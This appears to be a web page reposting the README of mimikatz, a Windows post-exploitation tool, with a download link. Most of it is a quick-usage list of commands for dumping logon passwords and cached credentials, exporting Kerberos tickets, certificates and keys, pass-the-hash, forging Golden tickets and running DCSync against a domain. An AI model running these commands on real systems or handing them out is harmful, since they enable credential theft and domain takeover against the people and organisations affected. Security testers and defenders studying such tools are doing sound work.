A Post-Exploitation Tool to Extract Plaintexts Passwords, Hash, PIN Code from Memory


mimikatz is a tool made to learn C and make some experiments with Windows security.
It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

But that’s not all! Crypto, Terminal Server, Events, … lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes).
If you don’t want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases


Quick usage

log

privilege::debug


sekurlsa

sekurlsa::logonpasswords

sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd


kerberos

kerberos::list /export

kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi


crypto

crypto::capi

crypto::cng

crypto::certificates /export

crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export

crypto::keys /machine /export


vault & lsadump

vault::cred

vault::list

token::elevate

vault::cred

vault::list

lsadump::sam

lsadump::secrets

lsadump::cache

token::revert

lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Download Mimikatz

Share.

About Author

Comments are closed.